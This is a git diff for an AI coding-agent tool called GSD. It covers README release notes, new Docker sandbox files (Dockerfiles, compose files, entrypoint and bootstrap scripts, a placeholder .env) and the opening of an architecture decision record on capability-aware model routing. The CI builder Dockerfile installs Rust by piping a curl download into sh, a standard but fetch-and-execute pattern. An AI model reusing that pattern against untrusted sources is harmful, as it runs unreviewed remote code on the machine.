-- **Unborn branch support** — `nativeBranchExists` handles repos with zero commits, preventing dispatch deadlock on new repos. (#1815)
-- **Ghost milestone detection** — empty `.gsd/milestones/` directories are skipped instead of crashing `deriveState()`. (#1817)
-- **Default branch detection** — milestone merge detects `master` vs `main` instead of hardcoding. (#1669)
-- **Milestone title extraction** — titles are pulled from CONTEXT.md headings when no ROADMAP exists. (#1729)
+### Infrastructure
 
-### Windows & Platform
+- **Ollama native provider** — `/api/chat` provider with full option exposure, `apiKey` auth mode, and headless probe.
+- **MCP OAuth** — MCP client supports OAuth auth provider for HTTP transport.
+- **WAL-safe migration backup** — database migrations create WAL-safe backups with stronger regression tests.
+- **Xcode/xcodegen detection** — project detection now supports Xcode bundles and xcodegen.
+- **170+ bug fixes** — state machine resilience, worktree safety, prompt injection, session recovery, and more.
 
-- **Windows path handling** — 8.3 short paths, `pathToFileURL` for ESM imports, and `realpathSync.native` fixes across the test suite and verification gate. (#1804)
-- **DEP0190 fix** — `spawnSync` deprecation warning eliminated by passing commands to shell explicitly. (#1827)
-- **Web build skip on Windows** — Next.js webpack EPERM errors on system directories are handled gracefully.
+See the full [Changelog](./CHANGELOG.md) for details on every release.
 
-### Developer Experience
+<details>
+<summary>Previous highlights (v2.63 and earlier)</summary>
 
-- **@ file finder fix** — typing `@` no longer freezes the TUI. The fix adds debounce, dedup, and empty-query short-circuit. (#1832)
-- **Tool-call loop guard** — detects and breaks infinite tool-call loops within a single unit, preventing stack overflow. (#1801)
-- **Completion deferral fix** — roadmap checkbox and UAT stub are fixed at task level, closing the fragile handoff window between last task and `complete-slice`. (#1819)
+- **MCP server** — 6 read-only project state tools for external integrations, auto-wrapup guard, and question dedup
+- **Ollama extension** — first-class local LLM support via Ollama, with dynamic routing enabled by default
+- **Discord bot & daemon** — dedicated daemon package, Discord bot, and headless text mode with tool calls
+- **Capability-aware model routing (ADR-004)** — capability scoring, `before_model_select` hook, and task metadata extraction
+- **VS Code sidebar redesign** — SCM provider, checkpoints, diagnostics panel, activity feed, workflow controls, session forking
+- **`/gsd parallel watch`** — native TUI overlay for real-time worker monitoring
+- **Codebase map** — automatic codebase map injection for fresh agent contexts
+- **`--resume` flag** — resume previous sessions from the CLI
+- **Concurrent invocation guard** — prevents overlapping auto-mode runs
+- **VS Code integration** — status bar, file decorations, bash terminal, session tree, conversation history, and code lens
+- **Skills overhaul** — 30+ skill packs covering major frameworks, databases, and cloud platforms
+- **Single-writer state engine** — disciplined state transitions with machine guards and TOCTOU hardening
+- **DB-backed planning tools** — atomic SQLite tool calls for state transitions
+- **Declarative workflow engine** — YAML workflows through auto-loop
+- **Doctor: worktree lifecycle checks** — validates worktree health, detects orphans, consolidates cleanup
 
-See the full [Changelog](./CHANGELOG.md) for all 70+ fixes in this release.
-
-### Previous highlights (v2.39–v2.40)
-
-- **GitHub sync extension** — auto-sync milestones to GitHub Issues, PRs, and Milestones
-- **Skill tool resolution** — skills auto-activate in dispatched prompts
-- **Health check phase 2** — real-time doctor issues in dashboard and visualizer
-- **Forensics upgrade** — full-access GSD debugger with anomaly detection
-- **Pipeline decomposition** — auto-loop rewritten as linear phase pipeline
-- **Sliding-window stuck detection** — pattern-aware, fewer false positives
-- **Data-loss recovery** — automatic detection and recovery from v2.30–v2.38 migration issues
+</details>
 
 ---
 
@@ -118,7 +115,9 @@ Full documentation is available in the [`docs/`](./docs/) directory:
 - **[Visualizer](./docs/visualizer.md)** — workflow visualizer with stats and discussion status
 - **[Remote Questions](./docs/remote-questions.md)** — route decisions to Slack or Discord when human input is needed
 - **[Dynamic Model Routing](./docs/dynamic-model-routing.md)** — complexity-based model selection and budget pressure
+- **[Web Interface](./docs/web-interface.md)** — browser-based project management and real-time progress
 - **[Pipeline Simplification (ADR-003)](./docs/ADR-003-pipeline-simplification.md)** — merged research into planning, mechanical completion
+- **[Docker Sandbox](./docker/README.md)** — run GSD auto mode in an isolated Docker container
 - **[Migration from v1](./docs/migration.md)** — `.planning` → `.gsd` migration
 
 ---
@@ -218,7 +217,7 @@ Auto mode is a state machine driven by files on disk. It reads `.gsd/STATE.md`,
 
 2. **Context pre-loading** — The dispatch prompt includes inlined task plans, slice plans, prior task summaries, dependency summaries, roadmap excerpts, and decisions register. The LLM starts with everything it needs instead of spending tool calls reading files.
 
-3. **Git worktree isolation** — Each milestone runs in its own git worktree with a `milestone/<MID>` branch. All slice work commits sequentially — no branch switching, no merge conflicts. When the milestone completes, it's squash-merged to main as one clean commit.
+3. **Git isolation** — When `git.isolation` is set to `worktree` or `branch`, each milestone runs on its own `milestone/<MID>` branch (in a worktree or in-place). All slice work commits sequentially — no branch switching, no merge conflicts. When the milestone completes, it's squash-merged to main as one clean commit. The default is `none` (work on the current branch), configurable via preferences.
 
 4. **Crash recovery** — A lock file tracks the current unit. If the session dies, the next `/gsd auto` reads the surviving session file, synthesizes a recovery briefing from every tool call that made it to disk, and resumes with full context. Parallel orchestrator state is persisted to disk with PID liveness detection, so multi-worker sessions survive crashes too. In headless mode, crashes trigger automatic restart with exponential backoff (default 3 attempts).
 
@@ -354,6 +353,8 @@ On first run, GSD launches a branded setup wizard that walks you through LLM pro
 | `/gsd stop`             | Stop auto mode gracefully                                       |
 | `/gsd steer`            | Hard-steer plan documents during execution                      |
 | `/gsd discuss`          | Discuss architecture and decisions (works alongside auto mode)  |
+| `/gsd rethink`          | Conversational project reorganization                           |
+| `/gsd mcp`              | MCP server status and connectivity                              |
 | `/gsd status`           | Progress dashboard                                              |
 | `/gsd queue`            | Queue future milestones (safe during auto mode)                 |
 | `/gsd prefs`            | Model selection, timeouts, budget ceiling                       |
@@ -460,7 +461,7 @@ An auto-generated `index.html` shows all reports with progression metrics across
 
 ### Preferences
 
-GSD preferences live in `~/.gsd/preferences.md` (global) or `.gsd/preferences.md` (project). Manage with `/gsd prefs`.
+GSD preferences live in `~/.gsd/PREFERENCES.md` (global) or `.gsd/PREFERENCES.md` (project). Manage with `/gsd prefs`.
 
 ```yaml
 ---
@@ -501,7 +502,7 @@ auto_report: true
 | `skill_rules`          | Situational rules for skill routing                                                                   |
 | `skill_staleness_days` | Skills unused for N days get deprioritized (default: 60, 0 = disabled)                                |
 | `unique_milestone_ids` | Uses unique milestone names to avoid clashes when working in teams of people                          |
-| `git.isolation`        | `worktree` (default), `branch`, or `none` — disable worktree isolation for projects that don't need it           |
+| `git.isolation`        | `none` (default), `worktree`, or `branch` — enable worktree or branch isolation for milestone work               |
 | `git.manage_gitignore` | Set `false` to prevent GSD from modifying `.gitignore`                                                           |
 | `verification_commands`| Array of shell commands to run after task execution (e.g., `["npm run lint", "npm run test"]`)        |
 | `verification_auto_fix`| Auto-retry on verification failures (default: true)                                                   |
@@ -542,7 +543,7 @@ See the full [Token Optimization Guide](./docs/token-optimization.md) for detail
 
 ### Bundled Tools
 
-GSD ships with 19 extensions, all loaded automatically:
+GSD ships with 24 extensions, all loaded automatically:
 
 | Extension              | What it provides                                                                                                       |
 | ---------------------- | ---------------------------------------------------------------------------------------------------------------------- |
@@ -564,7 +565,12 @@ GSD ships with 19 extensions, all loaded automatically:
 | **Remote Questions**   | Route decisions to Slack/Discord when human input is needed in headless/CI mode                                         |
 | **Universal Config**   | Discover and import MCP servers and rules from other AI coding tools                                                    |
 | **AWS Auth**           | Automatic Bedrock credential refresh for AWS-hosted models                                                              |
-| **TTSR**               | Tool-use type-safe runtime validation                                                                                   |
+| **Ollama**             | First-class local LLM support via Ollama                                                                                |
+| **Claude Code CLI**    | External provider extension for Claude Code CLI                                                                         |
+| **cmux**               | Claude multiplexer integration — desktop notifications, sidebar metadata, visual subagent splits                        |
+| **GitHub Sync**        | Auto-sync milestones to GitHub Issues, PRs, and Milestones                                                              |
+| **LSP**                | Language Server Protocol — diagnostics, definitions, references, hover, rename                                          |
+| **TTSR**               | Tool-triggered system rules — conditional context injection based on tool usage                                         |
 
 ### Bundled Agents
 
@@ -611,7 +617,7 @@ The best practice for working in teams is to ensure unique milestone names acros
 
 ### Unique Milestone Names
 
-Create or amend your `.gsd/preferences.md` file within the repo to include `unique_milestone_ids: true` e.g.
+Create or amend your `.gsd/PREFERENCES.md` file within the repo to include `unique_milestone_ids: true` e.g.
 
 ```markdown
 ---
@@ -620,7 +626,7 @@ unique_milestone_ids: true
 ---
 ```
 
-With the above `.gitignore` set up, the `.gsd/preferences.md` file is checked into the repo ensuring all teammates use unique milestone names to avoid collisions.
+With the above `.gitignore` set up, the `.gsd/PREFERENCES.md` file is checked into the repo ensuring all teammates use unique milestone names to avoid collisions.
 
 Milestone names will now be generated with a 6 char random string appended e.g. instead of `M001` you'll get something like `M001-ush8s3`
 
@@ -628,7 +634,7 @@ Milestone names will now be generated with a 6 char random string appended e.g.
 
 1. Ensure you are not in the middle of any milestones (clean state)
 2. Update the `.gsd/` related entries in your `.gitignore` to follow the `Suggested .gitignore setup` section under `Working in teams` (ensure you are no longer blanket ignoring the whole `.gsd/` directory)
-3. Update your `.gsd/preferences.md` file within the repo as per section `Unique Milestone Names`
+3. Update your `.gsd/PREFERENCES.md` file within the repo as per section `Unique Milestone Names`
 4. If you want to update all your existing milestones use this prompt in GSD: `I have turned on unique milestone ids, please update all old milestone ids to use this new format e.g. M001-abc123 where abc123 is a random 6 char lowercase alpha numeric string. Update all references in all .gsd file contents, file names and directory names. Validate your work once done to ensure referential integrity.`
 5. Commit to git
 
@@ -649,7 +655,7 @@ gsd (CLI binary)
           ├─ resource-loader.ts  Syncs bundled extensions + agents to ~/.gsd/agent/
           └─ src/resources/
               ├─ extensions/gsd/    Core GSD extension (auto, state, commands, ...)
-              ├─ extensions/...     18 supporting extensions
+              ├─ extensions/...     23 supporting extensions
               ├─ agents/            scout, researcher, worker
               ├─ AGENTS.md          Agent routing instructions
               └─ GSD-WORKFLOW.md    Manual bootstrap protocol
diff --git a/docker/.env.example b/docker/.env.example
new file mode 100644
index 000000000..ca9c3db84
--- /dev/null
+++ b/docker/.env.example
@@ -0,0 +1,44 @@
+# ──────────────────────────────────────────────
+# GSD Docker Sandbox — Environment Variables
+# Copy this file to .env and fill in your keys.
+# ──────────────────────────────────────────────
+
+# ── Container User Identity ──
+# Match your host UID/GID to avoid permission issues on bind mounts.
+# Run `id -u` and `id -g` on your host to find the right values.
+PUID=1000
+PGID=1000
+
+# ── LLM Provider API Keys (at least one required) ──
+
+# Anthropic (Claude)
+# ANTHROPIC_API_KEY=sk-ant-...
+
+# OpenAI
+# OPENAI_API_KEY=sk-...
+
+# Google (Gemini)
+# GOOGLE_API_KEY=...
+
+# OpenRouter (multi-provider gateway)
+# OPENROUTER_API_KEY=sk-or-...
+
+# ── Optional: Research & Search Tools ──
+
+# Brave Search API
+# BRAVE_API_KEY=...
+
+# Tavily Search API
+# TAVILY_API_KEY=tvly-...
+
+# Jina AI (reader/search)
+# JINA_API_KEY=...
+
+# ── Optional: Git & GitHub ──
+
+# GitHub personal access token (for PR operations)
+# GITHUB_TOKEN=ghp_...
+
+# Git author identity inside the sandbox
+# GIT_AUTHOR_NAME=Your Name
+# GIT_AUTHOR_EMAIL=you@example.com
diff --git a/docker/Dockerfile.ci-builder b/docker/Dockerfile.ci-builder
new file mode 100644
index 000000000..822651db4
--- /dev/null
+++ b/docker/Dockerfile.ci-builder
@@ -0,0 +1,20 @@
+# ──────────────────────────────────────────────
+# CI Builder
+# Image: ghcr.io/gsd-build/gsd-ci-builder
+# Used by: pipeline.yml Dev stage
+# ──────────────────────────────────────────────
+FROM node:24-bookworm
+
+# Rust toolchain (stable, minimal profile)
+RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y --default-toolchain stable --profile minimal
+ENV PATH="/root/.cargo/bin:${PATH}"
+
+# Cross-compilation for linux-arm64
+RUN apt-get update && apt-get install -y --no-install-recommends \
+    gcc-aarch64-linux-gnu \
+    g++-aarch64-linux-gnu \
+    && rustup target add aarch64-unknown-linux-gnu \
+    && rm -rf /var/lib/apt/lists/*
+
+# Verify toolchain
+RUN node --version && rustc --version && cargo --version
diff --git a/docker/Dockerfile.sandbox b/docker/Dockerfile.sandbox
new file mode 100644
index 000000000..596bdf803
--- /dev/null
+++ b/docker/Dockerfile.sandbox
@@ -0,0 +1,42 @@
+# ──────────────────────────────────────────────
+# GSD Docker Sandbox Template
+# Base: docker/sandbox-templates:shell
+# Purpose: Isolated environment for GSD auto mode
+# Usage: docker sandbox create --template ./docker
+# ──────────────────────────────────────────────
+FROM node:24-bookworm-slim
+
+# System dependencies required by GSD
+RUN apt-get update && apt-get install -y --no-install-recommends \
+    git \
+    curl \
+    ca-certificates \
+    openssh-client \
+    gosu \
+    && rm -rf /var/lib/apt/lists/*
+
+# Install GSD globally — version controlled via build arg
+ARG GSD_VERSION=latest
+RUN npm install -g gsd-pi@${GSD_VERSION}
+
+# Create non-root user for sandbox isolation
+RUN groupadd --gid 1000 gsd \
+    && useradd --uid 1000 --gid gsd --shell /bin/bash --create-home gsd
+
+# Persistent GSD state directory
+RUN mkdir -p /home/gsd/.gsd && chown -R gsd:gsd /home/gsd/.gsd
+
+# Workspace directory — synced from host via Docker sandbox
+WORKDIR /workspace
+RUN chown gsd:gsd /workspace
+
+# Entrypoint handles UID/GID remapping, bootstrap, and drops to gsd user
+COPY entrypoint.sh /usr/local/bin/entrypoint.sh
+COPY bootstrap.sh /usr/local/bin/bootstrap.sh
+RUN chmod +x /usr/local/bin/entrypoint.sh /usr/local/bin/bootstrap.sh
+
+# Expose default GSD web UI port
+EXPOSE 3000
+
+ENTRYPOINT ["/usr/local/bin/entrypoint.sh"]
+CMD ["gsd", "--help"]
diff --git a/docker/README.md b/docker/README.md
new file mode 100644
index 000000000..4d9e8ae06
--- /dev/null
+++ b/docker/README.md
@@ -0,0 +1,144 @@
+# GSD Docker Sandbox
+
+Run GSD auto mode inside an isolated Docker sandbox so it cannot touch your host filesystem, SSH keys, or other projects.
+
+## Prerequisites
+
+- Docker Desktop 4.58+ (macOS or Windows; Linux support is experimental)
+- At least one LLM provider API key
+
+## Docker Images
+
+| File | Purpose |
+|------|---------|
+| `Dockerfile.sandbox` | Runtime sandbox with entrypoint (UID remapping, bootstrap) |
+| `Dockerfile.ci-builder` | CI builds — includes build tools, no entrypoint magic |
+
+## Compose Files
+
+| File | Purpose |
+|------|---------|
+| `docker-compose.yaml` | Minimal zero-config setup — just works with sensible defaults |
+| `docker-compose.full.yaml` | Fully documented reference with all options, resource limits, health checks |
+
+Start with `docker-compose.yaml`. Copy options from `docker-compose.full.yaml` when you need them.
+
+## Quick Start
+
+### Option A: Docker Sandbox CLI (recommended)
+
+Docker Sandboxes provide MicroVM isolation — each sandbox runs in a lightweight VM with its own kernel and private Docker daemon.
+
+```bash
+# Create a sandbox from the template
+docker sandbox create --template ./docker --name gsd-sandbox
+
+# Shell into the sandbox
+docker sandbox exec -it gsd-sandbox bash
+
+# Inside the sandbox, run GSD
+gsd auto "implement the feature described in issue #42"
+```
+
+### Option B: Docker Compose
+
+For environments without Docker Sandbox support, use Compose for container-level isolation:
+
+```bash
+# 1. Configure API keys
+cp docker/.env.example docker/.env
+# Edit docker/.env with your keys
+
+# 2. Start the sandbox
+docker compose -f docker/docker-compose.yaml up -d
+
+# 3. Shell into the container
+docker exec -it gsd-sandbox bash
+
+# 4. Run GSD inside the container
+gsd auto "implement the feature described in issue #42"
+```
+
+## UID/GID Remapping
+
+The entrypoint handles UID/GID remapping via `PUID` and `PGID` environment variables. This avoids permission issues on bind-mounted volumes by matching the container's `gsd` user to your host UID/GID.
+
+```bash
+# Find your host UID/GID
+id -u  # PUID
+id -g  # PGID
+```
+
+Set these in your `.env` file or in the `environment` section of the compose file. Defaults to `1000:1000`.
+
+## Entrypoint Behavior
+
+The container entrypoint (`entrypoint.sh`) runs four steps on every start:
+
+1. **UID/GID remapping** — adjusts the `gsd` user to match `PUID`/`PGID`
+2. **Pre-create critical files** — prevents Docker bind-mount from creating directories where files are expected
+3. **Sentinel-based bootstrap** — runs `bootstrap.sh` exactly once on first boot
+4. **Drop privileges** — `exec gosu gsd` for proper PID 1 signal forwarding
+
+No hardcoded `user:` directive in compose — the entrypoint starts as root, remaps, then drops to `gsd`.
+
+## Two-Terminal Workflow
+
+GSD's recommended workflow uses two terminals — one for auto mode, one for interactive discussion:
+
+```bash
+# Terminal 1: auto mode
+docker sandbox exec -it gsd-sandbox bash
+gsd auto "your task description"
+
+# Terminal 2: discuss / monitor
+docker sandbox exec -it gsd-sandbox bash
+gsd discuss
+```
+
+With Docker Compose, replace `docker sandbox exec` with `docker exec`.
+
+## Credential Injection
+
+### Docker Sandbox (automatic)
+
+Docker's proxy layer forwards API keys set in your host shell config (`~/.bashrc`, `~/.zshrc`) into the sandbox automatically. Keys are never stored inside the sandbox.
+
+### Docker Compose (manual)
+
+Copy `docker/.env.example` to `docker/.env` and fill in your keys. The `.env` file is gitignored and never committed.
+
+## Network Allowlisting
+
+If you restrict outbound network access in your sandbox, GSD needs these endpoints:
+
+| Purpose | Endpoints |
+|---------|-----------|
+| LLM APIs | `api.anthropic.com`, `api.openai.com`, `generativelanguage.googleapis.com`, `openrouter.ai` |
+| Package registry | `registry.npmjs.org` |
+| Research tools | `api.search.brave.com`, `api.tavily.com`, `r.jina.ai` |
+| GitHub | `api.github.com`, `github.com` |
+
+## Customizing the Image
+
+Build with a specific GSD version:
+
+```bash
+docker compose -f docker/docker-compose.yaml build --build-arg GSD_VERSION=2.51.0
+```
+
+## Cleanup
+
+```bash
+# Docker Sandbox
+docker sandbox rm gsd-sandbox
+
+# Docker Compose
+docker compose -f docker/docker-compose.yaml down -v
+```
+
+## Known Limitations
+
+- **macOS/Windows only**: Docker Sandboxes require Docker Desktop 4.58+. Linux sandbox support is experimental.
+- **Environment parity**: The sandbox runs Ubuntu (Debian). macOS-only dependencies may not work inside the sandbox.
+- **Named agent registration**: Docker Desktop's built-in named agents (claude, codex, etc.) are registered by Docker itself. Third-party tools cannot register new named agents. GSD uses the generic shell sandbox type with a custom template instead.
diff --git a/docker/bootstrap.sh b/docker/bootstrap.sh
new file mode 100755
index 000000000..463952877
--- /dev/null
+++ b/docker/bootstrap.sh
@@ -0,0 +1,27 @@
+#!/bin/bash
+set -e
+
+# ──────────────────────────────────────────────
+# GSD First-Boot Bootstrap
+#
+# Runs once on initial container creation.
+# Called by entrypoint.sh as the gsd user.
+#
+# This script is idempotent — safe to run multiple
+# times, but the sentinel in entrypoint.sh ensures
+# it only runs once in practice.
+# ──────────────────────────────────────────────
+
+# ── Git Identity ────────────────────────────────────────
+# Without this, git commits inside the container will fail
+# or use garbage defaults.
+
+if [ -n "${GIT_AUTHOR_NAME}" ]; then
+    git config --global user.name "${GIT_AUTHOR_NAME}"
+fi
+
+if [ -n "${GIT_AUTHOR_EMAIL}" ]; then
+    git config --global user.email "${GIT_AUTHOR_EMAIL}"
+fi
+
+echo "Bootstrap complete."
diff --git a/docker/docker-compose.full.yaml b/docker/docker-compose.full.yaml
new file mode 100644
index 000000000..6ff8cad83
--- /dev/null
+++ b/docker/docker-compose.full.yaml
@@ -0,0 +1,61 @@
+services:
+  gsd:
+    build:
+      context: .                        # Build context is the docker/ directory
+      dockerfile: Dockerfile.sandbox    # Runtime sandbox image with entrypoint
+      args:
+        GSD_VERSION: latest             # Pin a specific version: GSD_VERSION=2.51.0
+
+    container_name: gsd-sandbox
+
+    ports:
+      - "3000:3000"                     # GSD web UI
+
+    volumes:
+      - ../:/workspace                  # Project root mounted into the container
+      - gsd-state:/home/gsd/.gsd        # Persistent GSD state across restarts
+      # - ~/.ssh:/home/gsd/.ssh:ro      # SSH keys for git operations (read-only)
+      # - ~/.gitconfig:/home/gsd/.gitconfig:ro  # Host git config
+
+    env_file:
+      - .env                            # API keys and secrets (see .env.example)
+
+    environment:
+      - NODE_ENV=development
+      # UID/GID remapping — match your host user to avoid permission issues
+      # on bind-mounted volumes. The entrypoint remaps the container's gsd
+      # user to these IDs at startup. Run `id -u` / `id -g` to find yours.
+      - PUID=1000
+      - PGID=1000
+      # Git identity inside the container (overrides .env if set here)
+      # - GIT_AUTHOR_NAME=Your Name
+      # - GIT_AUTHOR_EMAIL=you@example.com
+
+    stdin_open: true                    # Keep stdin open for interactive use
+    tty: true                           # Allocate a pseudo-TTY
+
+    # Health check — verify GSD is installed and responsive
+    healthcheck:
+      test: ["CMD", "gsd", "--version"]
+      interval: 30s
+      timeout: 5s
+      retries: 3
+      start_period: 10s
+
+    # Resource limits — uncomment to constrain container resources
+    # deploy:
+    #   resources:
+    #     limits:
+    #       cpus: "4.0"
+    #       memory: 8G
+    #     reservations:
+    #       cpus: "1.0"
+    #       memory: 2G
+
+    # Network mode — uncomment ONE if you need host networking
+    # network_mode: host               # Full host network access (no port mapping needed)
+    # network_mode: bridge             # Default Docker bridge (already the default)
+
+volumes:
+  gsd-state:
+    driver: local
diff --git a/docker/docker-compose.yaml b/docker/docker-compose.yaml
new file mode 100644
index 000000000..21641e2f1
--- /dev/null
+++ b/docker/docker-compose.yaml
@@ -0,0 +1,23 @@
+services:
+  gsd:
+    build:
+      context: .
+      dockerfile: Dockerfile.sandbox
+      args:
+        GSD_VERSION: latest
+    container_name: gsd-sandbox
+    ports:
+      - "3000:3000"
+    volumes:
+      - ../:/workspace
+      - gsd-state:/home/gsd/.gsd
+    env_file:
+      - .env
+    environment:
+      - NODE_ENV=development
+    stdin_open: true
+    tty: true
+
+volumes:
+  gsd-state:
+    driver: local
diff --git a/docker/entrypoint.sh b/docker/entrypoint.sh
new file mode 100755
index 000000000..465a28fe0
--- /dev/null
+++ b/docker/entrypoint.sh
@@ -0,0 +1,81 @@
+#!/bin/bash
+set -e
+
+# ──────────────────────────────────────────────
+# GSD Container Entrypoint
+#
+# Responsibilities:
+#   1. UID/GID remapping — match host user via PUID/PGID
+#   2. Pre-create critical files — prevent Docker bind-mount
+#      from creating directories where files are expected
+#   3. Sentinel-based bootstrap — one-time first-boot setup
+#   4. Signal forwarding — exec into the final process
+# ──────────────────────────────────────────────
+
+GSD_USER="gsd"
+GSD_HOME="/home/${GSD_USER}"
+GSD_DIR="${GSD_HOME}/.gsd"
+
+# ── 1. UID/GID Remapping ────────────────────────────────
+# Accept PUID/PGID from the environment so the container
+# can run with the same UID/GID as the host user, avoiding
+# permission headaches on bind-mounted volumes.
+
+PUID="${PUID:-1000}"
+PGID="${PGID:-1000}"
+
+CURRENT_UID=$(id -u "${GSD_USER}")
+CURRENT_GID=$(id -g "${GSD_USER}")
+
+REMAPPED=0
+
+if [ "${PGID}" != "${CURRENT_GID}" ]; then
+    groupmod -o -g "${PGID}" "${GSD_USER}"
+    REMAPPED=1
+fi
+
+if [ "${PUID}" != "${CURRENT_UID}" ]; then
+    usermod -o -u "${PUID}" "${GSD_USER}"
+    REMAPPED=1
+fi
+
+# Fix ownership only when UID/GID actually changed
+if [ "${REMAPPED}" -eq 1 ]; then
+    chown -R "${PUID}:${PGID}" "${GSD_HOME}"
+    chown "${PUID}:${PGID}" /workspace
+fi
+
+# ── 2. Pre-create Critical Files ────────────────────────
+# Docker bind-mounts will create a *directory* if the target
+# path doesn't exist. We need these to be files, so touch
+# them before Docker gets a chance to mangle things.
+
+mkdir -p "${GSD_DIR}"
+
+if [ ! -f "${GSD_DIR}/settings.json" ]; then
+    echo '{}' > "${GSD_DIR}/settings.json"
+fi
+
+chown "${PUID}:${PGID}" "${GSD_DIR}" "${GSD_DIR}/settings.json"
+
+# ── 3. Sentinel-based Bootstrap ─────────────────────────
+# Run first-boot setup exactly once. Subsequent container
+# starts (or restarts) skip this entirely.
+
+SENTINEL="${GSD_DIR}/.bootstrapped"
+
+if [ ! -f "${SENTINEL}" ]; then
+    if [ -x /usr/local/bin/bootstrap.sh ]; then
+        # Run bootstrap as the gsd user so files get correct ownership
+        gosu "${GSD_USER}" /usr/local/bin/bootstrap.sh
+    fi
+    touch "${SENTINEL}"
+    chown "${PUID}:${PGID}" "${SENTINEL}"
+fi
+
+# ── 4. Drop Privileges & Exec ──────────────────────────
+# Replace this shell process with the final command running
+# as the gsd user. exec + gosu = proper PID 1 = proper
+# signal forwarding (SIGTERM, SIGINT, etc.).
+
+exec gosu "${GSD_USER}" "$@"
diff --git a/docs/ADR-004-capability-aware-model-routing.md b/docs/ADR-004-capability-aware-model-routing.md
new file mode 100644
index 000000000..c2ce3d2d2
--- /dev/null
+++ b/docs/ADR-004-capability-aware-model-routing.md
@@ -0,0 +1,460 @@
+# ADR-004: Capability-Aware Model Routing
+
+**Status:** Implemented (Phase 2)
+**Date:** 2026-03-26
+**Revised:** 2026-04-03
+**Deciders:** Jeremy McSpadden
+**Related:** ADR-003 (pipeline simplification), [Issue #2655](https://github.com/gsd-build/gsd-2/issues/2655), `docs/dynamic-model-routing.md`
+
+## Context
+
+GSD already supports dynamic model routing in auto-mode, but the current router is fundamentally **complexity-tier and cost based**, not **task-capability based**.
+
+Today the selection pipeline is:
+
+```
+unit dispatch
+  → classifyUnitComplexity(unitType, unitId, basePath, budgetPct)
+      → UNIT_TYPE_TIERS default mapping
+      → analyzeTaskComplexity() / analyzePlanComplexity()  [metadata heuristics]
+      → getAdaptiveTierAdjustment()                        [routing history]
+      → applyBudgetPressure()                              [budget ceiling]
+  → resolveModelForComplexity(classification, phaseConfig, routingConfig, availableModelIds)
+      → downgrade-only: never upgrades beyond user's configured model
+      → MODEL_CAPABILITY_TIER lookup → cheapest available in tier
+      → fallback chain assembly
+  → resolveModelId() → pi.setModel()
+  → before_provider_request hook (payload mutation only)
+```
+
+This architecture works when all models inside a tier are effectively interchangeable. That assumption no longer holds.
+
+Users increasingly configure heterogeneous provider pools through `models.json`, scoped provider setup, and `/scoped-models`. In practice:
+
+- Claude-class models often perform best on greenfield implementation and architecture work
+- Codex-class models often perform best on debugging, refactoring, and root-cause analysis
+- Gemini-class models often perform best on long-context synthesis and research-heavy tasks
+- Fast small models are often best for cheap validation, triage, and lightweight hooks
+
+The current router cannot express those differences. If Claude and Codex are both available at the same tier, GSD either:
+
+- treats them as equivalent and picks the cheaper one, or
+- requires the user to hardcode specific phase models manually
+
+That produces three structural problems:
+
+### 1. Wrong optimization target
+
+The router optimizes primarily for **task difficulty vs model cost**. The real problem is **task requirements vs model strengths**, subject to cost constraints.
+
+### 2. Poor behavior with heterogeneous pools
+
+Different users have different subscriptions and provider access. A fixed mapping like "research always uses Gemini" does not generalize when the user only has Claude + Codex, or only local models.
+
+### 3. Capability knowledge is trapped in user intuition
+
+Experienced users know which models are better at coding, debugging, research, long-context work, or instruction following. GSD has no representation for that knowledge, so it cannot route intelligently on the user's behalf.
+
+The system already has several building blocks that make a richer router feasible:
+
+- unit types already encode the kind of work being dispatched
+- `complexity-classifier.ts` already extracts rich `TaskMetadata` (file counts, dependency counts, tags, complexity keywords, code block counts)
+- `auto-dispatch.ts` and prompt builders provide stable task categories
+- `ctx.modelRegistry.getAvailable()` exposes the current model pool
+- `models.json` already supports user overrides and cost data per model
+- budget ceilings, routing history, and retry escalation already exist
+- the `model_select` hook fires on model changes and could be extended for pre-selection interception
+
+## Decision
+
+**Extend dynamic routing from a one-dimensional tier system to a two-dimensional system that combines complexity classification ("how hard") with capability scoring ("what kind"), while preserving downgrade-only semantics, budget controls, and user overrideability.**
+
+### Design Principles
+
+1. **Downgrade-only invariant is preserved.** The user's configured model for a phase is always the ceiling. Capability scoring ranks models within the eligible set — it never promotes above the user's configured model.
+
+2. **Complexity classification remains.** The existing `classifyUnitComplexity()` pipeline (unit type defaults, task plan analysis, adaptive learning, budget pressure) continues to determine tier eligibility. Capability scoring selects among tier-eligible models.
+
+3. **Cost is a constraint, not a score dimension.** Budget pressure constrains which models are eligible. Capability profiles describe what models are good at, not what they cost.
+
+4. **Requirement vectors are dynamic, not static.** Task requirements are computed from `(unitType, TaskMetadata)`, not from unit type alone.
+
+### The Revised Routing Pipeline
+
+```
+unit dispatch
+  → classifyUnitComplexity(unitType, unitId, basePath, budgetPct)
+      [unchanged — determines tier eligibility and budget filtering]
+  → resolveModelForComplexity(classification, phaseConfig, routingConfig, availableModelIds)
+      → STEP 1: filter to tier-eligible models (downgrade-only from user ceiling)
+      → STEP 2: if capability routing enabled AND >1 eligible model:
+          → computeTaskRequirements(unitType, taskMetadata)
+          → scoreEligibleModels(eligible, taskRequirements)
+          → select highest-scoring model (deterministic tie-break by cost, then ID)
+      → STEP 3: assemble fallback chain
+  → resolveModelId() → pi.setModel()
+```
+
+### Model Capability Profiles
+
+Each model gains an optional capability profile:
+
+```ts
+interface ModelCapabilities {
+  coding: number;       // greenfield implementation, code generation
+  debugging: number;    // root-cause analysis, error diagnosis, refactoring
+  research: number;     // information synthesis, investigation, exploration
+  reasoning: number;    // multi-step logic, planning, architecture
+  speed: number;        // response latency (inverse of thinking time)
+  longContext: number;  // effective use of large input windows
+  instruction: number;  // instruction following, structured output adherence
+}
+```
+
+Scores are normalized `0–100`. Seven dimensions. No `costEfficiency` dimension — cost is handled separately by budget pressure and tier economics.
+
+Models without a capability profile are treated as having uniform scores across all dimensions (score 50 in each), which makes capability scoring a no-op for those models and falls back to the existing cheapest-in-tier behavior.
+
+### Dynamic Task Requirement Vectors
+
+Requirement vectors are computed as a function of `(unitType, TaskMetadata)`, not looked up from a static table. This preserves the nuance that `classifyUnitComplexity` already captures.
+
+```ts
+function computeTaskRequirements(
+  unitType: string,
+  metadata?: TaskMetadata,
+): Partial<Record<keyof ModelCapabilities, number>> {
+  // Base vector from unit type
+  const base = BASE_REQUIREMENTS[unitType] ?? { reasoning: 0.5 };
+
+  // Refine based on task metadata (only for execute-task)
+  if (unitType === "execute-task" && metadata) {
+    // Docs/config/rename tasks → boost instruction, reduce coding
